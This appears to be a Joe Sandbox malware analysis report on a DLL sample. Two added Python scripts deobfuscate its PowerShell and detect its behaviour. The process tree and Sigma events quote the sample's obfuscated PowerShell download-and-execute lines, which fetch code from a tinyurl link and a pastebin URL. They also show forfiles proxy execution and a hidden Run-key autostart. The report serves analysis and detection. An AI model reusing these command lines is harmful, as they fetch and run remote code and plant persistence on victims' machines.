

Windows Analysis Report
5UIy3bo46y.dll

Overview

General Information

Sample name: 5UIy3bo46y.dll
(renamed file extension from exe to dll, renamed because original name is a hash value)
Original sample name: 0b9acce9a60dda0df4fdc61eb954433a5bff023ab04e38aca2c2f18aad70c3f3.exe
Analysis ID: 1534111
MD5: 674fb5fd30f3b299608e7d439f1bd3e7
SHA1: b3dabd98de642f0611b7d10f9602375f31b28f1b
SHA256: 0b9acce9a60dda0df4fdc61eb954433a5bff023ab04e38aca2c2f18aad70c3f3
Tags: exe, Neth3N, user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Obfuscated command line found
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Uses cmd line tools excessively to alter registry or file data
Connects to a URL shortener service
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sigma detected: CurrentVersion Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 5680 cmdline: loaddll64.exe "C:\Users\user\Desktop\5UIy3bo46y.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 5104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2144 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5UIy3bo46y.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 6944 cmdline: rundll32.exe "C:\Users\user\Desktop\5UIy3bo46y.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
        • powershell.exe (PID: 7180 cmdline: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • attrib.exe (PID: 8068 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • regsvr32.exe (PID: 5820 cmdline: regsvr32.exe /s C:\Users\user\Desktop\5UIy3bo46y.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
      • powershell.exe (PID: 7172 cmdline: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 8080 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • rundll32.exe (PID: 5060 cmdline: rundll32.exe C:\Users\user\Desktop\5UIy3bo46y.dll,DllRegisterServer MD5: EF3179D498793BF4234F708D3BE28633)
      • powershell.exe (PID: 6448 cmdline: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7352 cmdline: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 8148 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1652 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5844 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 3020 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 2864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2380 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 4240 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
No configs have been found
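The PowerShell command lines in the process tree above hide Invoke-Expression and Invoke-WebRequest behind Set-Alias (sal): callit becomes iex, an alias whose name is the value of $env:OS (Windows_NT on this host) becomes iwr, and the download URL is split across concatenated string literals; the forfiles.exe invocations proxy-execute the same pattern through /c with a decoy alias (fatbake for calc). The script below, added here as an example and not part of the Joe Sandbox report, statically resolves those aliases and folds the concatenations so the real cmdlets and URLs can be read off. The two command lines are copied from the tree; the environment map is a constructed assumption, and the function names are this example's own.

```python
"""Static resolution of the Set-Alias (sal) obfuscation used by the PowerShell
command lines in the process tree above.  Added example, not part of the
Joe Sandbox report; the command lines are copied from the tree, the environment
map is a constructed assumption (on Windows $env:OS is 'Windows_NT')."""
import re

# Built-in PowerShell aliases the sample relies on.
BUILTIN_ALIASES = {"sal": "Set-Alias", "iex": "Invoke-Expression",
                   "iwr": "Invoke-WebRequest"}

# Constructed: the only environment variable the sample dereferences.
SAMPLE_ENV = {"OS": "Windows_NT"}

# Copied from the report's process tree (PID 7172 and PID 8148).
RUNDLL_CMD = ("powershell.exe -windowstyle h -command sal callit ('iE'+'x'); "
              "sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + "
              "'om/yeykydun') -usebasicparsing)")
FORFILES_CMD = ('"C:\\Windows\\System32\\forfiles.exe" /p c:\\windows\\system32 '
                '/m notepad.exe /c "powershell.exe -command powershell -windowstyle h '
                "-command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; "
                "calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'\"")

CONCAT = re.compile(r"\(\s*('[^']*'(?:\s*\+\s*'[^']*')+)\s*\)")   # ('a' + 'b')
QUOTED = re.compile(r"('[^']*')")
IDENT = re.compile(r"[A-Za-z_]\w*")
URL = re.compile(r"\b[\w-]+(?:\.[\w-]+)+/[\w./-]*")


def script_after_last_command(cmdline):
    """Return the script handed to the innermost -command, outer quotes stripped."""
    return re.split(r"-command\s+", cmdline, flags=re.I)[-1].strip().strip("'\"")


def fold_concat(text):
    """Constant-fold ('ti' + 'nyu' + 'rl.c') into ('tinyurl.c')."""
    return CONCAT.sub(
        lambda m: "('" + "".join(re.findall(r"'([^']*)'", m.group(1))) + "')", text)


def deobfuscate(script, env):
    """Collect sal/Set-Alias definitions, then rewrite the remaining statements
    with every alias replaced by the cmdlet it finally resolves to."""
    aliases = dict(BUILTIN_ALIASES)
    statements = []
    for stmt in (s.strip() for s in fold_concat(script).split(";")):
        m = re.fullmatch(r"(?:sal|set-alias)\s+(\S+)\s+(\S+)", stmt, flags=re.I)
        if m:
            name, target = m.group(1), m.group(2).strip("()'")
            if name.lower().startswith("$env:"):      # alias *named* after an env var
                name = env.get(name[5:].upper(), name)
            aliases[name.lower()] = aliases.get(target.lower(), target)
            continue
        parts = QUOTED.split(stmt)                    # odd indices are string literals
        for i in range(0, len(parts), 2):
            parts[i] = IDENT.sub(
                lambda t: aliases.get(t.group(0).lower(), t.group(0)), parts[i])
        statements.append("".join(parts))
    urls = [u for s in statements for u in URL.findall(s.replace("'", ""))]
    return {"aliases": aliases, "statements": statements, "urls": urls}


if __name__ == "__main__":
    for cmd in (RUNDLL_CMD, FORFILES_CMD):
        result = deobfuscate(script_after_last_command(cmd), SAMPLE_ENV)
        print(result["statements"], result["urls"])
```

Both command lines resolve to Invoke-Expression over an Invoke-WebRequest of a short URL (tinyurl.com/yeykydun and pastebin.com/raw/sA04Mwk2), which is exactly what the "Connects to a URL shortener service" and "Connects to a pastebin service" signatures report. The resolver only handles the constructs this sample uses (sal, single-quoted concatenation, $env: alias names) and the -command switch spelled out in full; abbreviated switches such as -c or -enc would need the same prefix handling that powershell.exe applies.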
Source | Rule | Description | Author | Strings
Source: Process Memory Space: powershell.exe PID: 6448 | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
  • 0x1d893:$b1: ::WriteAllBytes(
  • 0x22aa9:$b1: ::WriteAllBytes(
  • 0xb3728:$b1: ::WriteAllBytes(
  • 0xb7f9a:$b1: ::WriteAllBytes(
  • 0x169bd:$s1: -join
  • 0x2d568:$s1: -join
  • 0x2d5a3:$s1: -join
  • 0x2d67e:$s1: -join
  • 0x2d6ac:$s1: -join
  • 0x2d9f8:$s1: -join
  • 0x2da1b:$s1: -join
  • 0x2dd55:$s1: -join
  • 0x2dd76:$s1: -join
  • 0x2dda8:$s1: -join
  • 0x2ddf0:$s1: -join
  • 0x2de1d:$s1: -join
  • 0x2de44:$s1: -join
  • 0x2de6f:$s1: -join
  • 0x2de8b:$s1: -join
  • 0x2df52:$s1: -join
  • 0x2e3f0:$s1: -join
Source: Process Memory Space: powershell.exe PID: 7172 | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
  • 0x32aa2:$b1: ::WriteAllBytes(
  • 0xb6b8b:$b1: ::WriteAllBytes(
  • 0x12a0b8:$b1: ::WriteAllBytes(
  • 0x7dc87:$s1: -join
  • 0xaae19:$s1: -join
  • 0xc4028:$s1: -join
  • 0xc41e5:$s1: -join
  • 0xdf171:$s1: -join
  • 0xdf8d1:$s1: -join
  • 0x18ea10:$s1: -join
  • 0x19ab14:$s1: -join
  • 0x19021:$s3: reverse
  • 0x1930f:$s3: reverse
  • 0x19a29:$s3: reverse
  • 0x1a1e2:$s3: reverse
  • 0x213d5:$s3: reverse
  • 0x217ef:$s3: reverse
  • 0x22377:$s3: reverse
  • 0x23024:$s3: reverse
  • 0xebf77:$s3: reverse
  • 0xf789d:$s3: reverse
Source: Process Memory Space: powershell.exe PID: 7180 | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
  • 0x42b2:$b1: ::WriteAllBytes(
  • 0x2ed93:$b1: ::WriteAllBytes(
  • 0x8b301:$b1: ::WriteAllBytes(
  • 0xfbd4c:$b1: ::WriteAllBytes(
  • 0xa85b:$s1: -join
  • 0x159e5:$s1: -join
  • 0xbe995:$s1: -join
  • 0xc2d47:$s1: -join
  • 0xc2f04:$s1: -join
  • 0xdea52:$s1: -join
  • 0xdf1b2:$s1: -join
  • 0x4a67d:$s3: reverse
  • 0x512d2:$s3: reverse
  • 0x532b9:$s3: reverse
  • 0x5e2e8:$s3: reverse
  • 0x6f1e4:$s3: reverse
  • 0x7694e:$s3: reverse
  • 0x1348b2:$s3: reverse
  • 0x134ba0:$s3: reverse
  • 0x1352ba:$s3: reverse
  • 0x135a73:$s3: reverse
Source: Process Memory Space: powershell.exe PID: 7352 | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
  • 0x8f2b8:$b1: ::WriteAllBytes(
  • 0x99753:$b1: ::WriteAllBytes(
  • 0x2ac4f5:$b1: ::WriteAllBytes(
  • 0x8310:$s1: -join
  • 0x834b:$s1: -join
  • 0x8426:$s1: -join
  • 0x8454:$s1: -join
  • 0x87a6:$s1: -join
  • 0x87c9:$s1: -join
  • 0x8b03:$s1: -join
  • 0x8b24:$s1: -join
  • 0x8b56:$s1: -join
  • 0x8b9e:$s1: -join
  • 0x8bcb:$s1: -join
  • 0x8bf2:$s1: -join
  • 0x8c1d:$s1: -join
  • 0x8c39:$s1: -join
  • 0x8d00:$s1: -join
  • 0x91a3:$s1: -join
  • 0x91c5:$s1: -join
  • 0x921d:$s1: -join
Source: Process Memory Space: powershell.exe PID: 5844 | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
  • 0x4d4cf:$b1: ::WriteAllBytes(
  • 0x6463e:$b1: ::WriteAllBytes(
  • 0x6d1a3:$b1: ::WriteAllBytes(
  • 0x74956:$b1: ::WriteAllBytes(
  • 0x160fdd:$s1: -join
  • 0x16173d:$s1: -join
  • 0x17a9ef:$s1: -join
  • 0x181d71:$s1: -join
  • 0x2e5c:$s3: reverse
  • 0x314a:$s3: reverse
  • 0x3864:$s3: reverse
  • 0x4d91:$s3: reverse
  • 0x51ab:$s3: reverse
  • 0x5d33:$s3: reverse
  • 0x6822:$s3: reverse
  • 0xce1a:$s3: reverse
  • 0xb24ce:$s3: reverse
  • 0xbde32:$s3: reverse
  • 0xeca5f:$s3: reverse
  • 0xed01a:$s3: reverse
  • 0x104b98:$s3: reverse
Source | Rule | Description | Author | Strings
Source: amsi64_6448.amsi.csv | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
  • 0xd1fd:$b1: ::WriteAllBytes(
  • 0xb902:$s1: -join
  • 0x50ae:$s4: +=
  • 0x5170:$s4: +=
  • 0x9397:$s4: +=
  • 0xb4b4:$s4: +=
  • 0xb79e:$s4: +=
  • 0xb8e4:$s4: +=
  • 0xf927:$s4: +=
  • 0xf9a7:$s4: +=
  • 0xfa6d:$s4: +=
  • 0xfaed:$s4: +=
  • 0xfcc3:$s4: +=
  • 0xfd47:$s4: +=
  • 0xd297:$e4: Get-WmiObject
  • 0xd339:$e4: Get-WmiObject
  • 0xde10:$e4: Get-WmiObject
  • 0xdfff:$e4: Get-Process
  • 0xe057:$e4: Start-Process
Source: amsi64_7172.amsi.csv | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
  • 0xd1fd:$b1: ::WriteAllBytes(
  • 0xb902:$s1: -join
  • 0x50ae:$s4: +=
  • 0x5170:$s4: +=
  • 0x9397:$s4: +=
  • 0xb4b4:$s4: +=
  • 0xb79e:$s4: +=
  • 0xb8e4:$s4: +=
  • 0xf927:$s4: +=
  • 0xf9a7:$s4: +=
  • 0xfa6d:$s4: +=
  • 0xfaed:$s4: +=
  • 0xfcc3:$s4: +=
  • 0xfd47:$s4: +=
  • 0xd297:$e4: Get-WmiObject
  • 0xd339:$e4: Get-WmiObject
  • 0xde10:$e4: Get-WmiObject
  • 0xdfff:$e4: Get-Process
  • 0xe057:$e4: Start-Process
Source: amsi64_7180.amsi.csv | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
  • 0xd1fd:$b1: ::WriteAllBytes(
  • 0xb902:$s1: -join
  • 0x50ae:$s4: +=
  • 0x5170:$s4: +=
  • 0x9397:$s4: +=
  • 0xb4b4:$s4: +=
  • 0xb79e:$s4: +=
  • 0xb8e4:$s4: +=
  • 0xf927:$s4: +=
  • 0xf9a7:$s4: +=
  • 0xfa6d:$s4: +=
  • 0xfaed:$s4: +=
  • 0xfcc3:$s4: +=
  • 0xfd47:$s4: +=
  • 0xd297:$e4: Get-WmiObject
  • 0xd339:$e4: Get-WmiObject
  • 0xde10:$e4: Get-WmiObject
  • 0xdfff:$e4: Get-Process
  • 0xe057:$e4: Start-Process
Source: amsi64_7352.amsi.csv | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
  • 0xd1fd:$b1: ::WriteAllBytes(
  • 0xb902:$s1: -join
  • 0x50ae:$s4: +=
  • 0x5170:$s4: +=
  • 0x9397:$s4: +=
  • 0xb4b4:$s4: +=
  • 0xb79e:$s4: +=
  • 0xb8e4:$s4: +=
  • 0xf927:$s4: +=
  • 0xf9a7:$s4: +=
  • 0xfa6d:$s4: +=
  • 0xfaed:$s4: +=
  • 0xfcc3:$s4: +=
  • 0xfd47:$s4: +=
  • 0xd297:$e4: Get-WmiObject
  • 0xd339:$e4: Get-WmiObject
  • 0xde10:$e4: Get-WmiObject
  • 0xdfff:$e4: Get-Process
  • 0xe057:$e4: Start-Process
Source: amsi64_5844.amsi.csv | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process

System Summary

Source: Process started | Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), CommandLine: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\5UIy3bo46y.dll, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 5820, ParentProcessName: regsvr32.exe, ProcessCommandLine: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), ProcessId: 7172, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), CommandLine: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\5UIy3bo46y.dll,DllRegisterServer, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 5060, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), ProcessId: 6448, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7180, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), CommandLine: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\5UIy3bo46y.dll,DllRegisterServer, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 5060, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), ProcessId: 6448, ProcessName: powershell.exe
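The Sigma events above carry the fields a detection consumes: ParentImage and Image for the PowerShell child under regsvr32.exe and rundll32.exe, CommandLine for the "-windowstyle h" parameter substring, and TargetObject and Details for the Run key that points at the hidden BeginSync.lnk. The script below, added here as an example and not part of the Joe Sandbox report or of the Sigma rule set, runs equivalent checks over constructed event records built from those fields plus one benign control; the event shape, the rule names and the helper names are this example's own.

```python
"""Detection logic over constructed events that mirror the Sigma matches above:
a script host spawned by regsvr32/rundll32, the '-windowstyle h' parameter
substring, and a CurrentVersion\\Run value pointing at a shortcut.  Added
example, not part of the Joe Sandbox report or the Sigma rule set; the events
are constructed from the report's fields and the rule names are this example's own."""
import ntpath
import re

# Constructed events in a flattened Sysmon-like shape (field values from the report).
EVENTS = [
    {"EventType": "ProcessCreate", "ProcessId": 7172,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "powershell.exe -windowstyle h -command sal callit ('iE'+'x'); "
                    "sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)"},
    {"EventType": "ProcessCreate", "ProcessId": 6448,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "powershell.exe -windowstyle h -command sal callit ('iE'+'x'); "
                    "sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)"},
    {"EventType": "RegistryValueSet", "ProcessId": 7180,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync",
     "Details": r'"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"'},
    # Constructed benign control: an operator running PowerShell from cmd.exe.
    {"EventType": "ProcessCreate", "ProcessId": 4321,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Service"},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
PROXY_PARENTS = {"regsvr32.exe", "rundll32.exe"}
RUN_KEY = re.compile(r"\\currentversion\\run(?:once)?\\")


def _prefixes(word):
    """Longest-first alternation of every prefix: powershell.exe accepts any
    unambiguous prefix of -WindowStyle and of Hidden, so '-w h' == '-windowstyle hidden'."""
    return "|".join(word[:n] for n in range(len(word), 0, -1))


HIDDEN_WINDOW = re.compile(
    rf"\s-(?:{_prefixes('windowstyle')})\s+(?:{_prefixes('hidden')})\b", re.I)


def image_name(path):
    return ntpath.basename(path).lower()


def rule_proxy_parent_spawns_script_host(ev):
    return (ev["EventType"] == "ProcessCreate"
            and image_name(ev["ParentImage"]) in PROXY_PARENTS
            and image_name(ev["Image"]) in SCRIPT_HOSTS)


def rule_hidden_window_parameter(ev):
    return (ev["EventType"] == "ProcessCreate"
            and image_name(ev["Image"]) in {"powershell.exe", "pwsh.exe"}
            and HIDDEN_WINDOW.search(ev.get("CommandLine", "")) is not None)


def rule_run_key_points_to_shortcut(ev):
    return (ev["EventType"] == "RegistryValueSet"
            and RUN_KEY.search(ev["TargetObject"].lower()) is not None
            and ev["Details"].strip('"').lower().endswith(".lnk"))


RULES = {
    "proxy_parent_spawns_script_host": rule_proxy_parent_spawns_script_host,
    "hidden_window_parameter": rule_hidden_window_parameter,
    "run_key_points_to_shortcut": rule_run_key_points_to_shortcut,
}


def evaluate(events):
    """Return (rule_name, ProcessId) pairs for every rule that matches an event."""
    return [(name, ev["ProcessId"]) for ev in events
            for name, rule in RULES.items() if rule(ev)]


def by_process(hits):
    """Group hits by PID: two independent signals on one process are far
    stronger than either alone, which is how the Sigma matches above stack."""
    grouped = {}
    for name, pid in hits:
        grouped.setdefault(pid, set()).add(name)
    return grouped


if __name__ == "__main__":
    for pid, names in sorted(by_process(evaluate(EVENTS)).items()):
        print(pid, sorted(names))
```

The hidden-window pattern accepts every parameter prefix that powershell.exe itself accepts, which is why the sample's "-windowstyle h" and a terser "-w h" both fire; a detection that only looks for the literal "-WindowStyle Hidden" misses this sample. PIDs 7172 and 6448 collect two independent hits each (proxy parent plus hidden window), PID 7180 is caught on the Run key alone, and the cmd.exe control produces nothing.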
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-15T16:00:28.799240+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.7 | 52050 | 162.159.128.233 | 443 | TCP
2024-10-15T16:00:28.800110+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.7 | 52049 | 162.159.128.233 | 443 | TCP
2024-10-15T16:00:38.975597+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.7 | 52102 | 162.159.128.233 | 443 | TCP
2024-10-15T16:00:39.025748+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.7 | 52104 | 162.159.128.233 | 443 | TCP
2024-10-15T16:00:56.974316+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.7 | 52203 | 162.159.128.233 | 443 | TCP
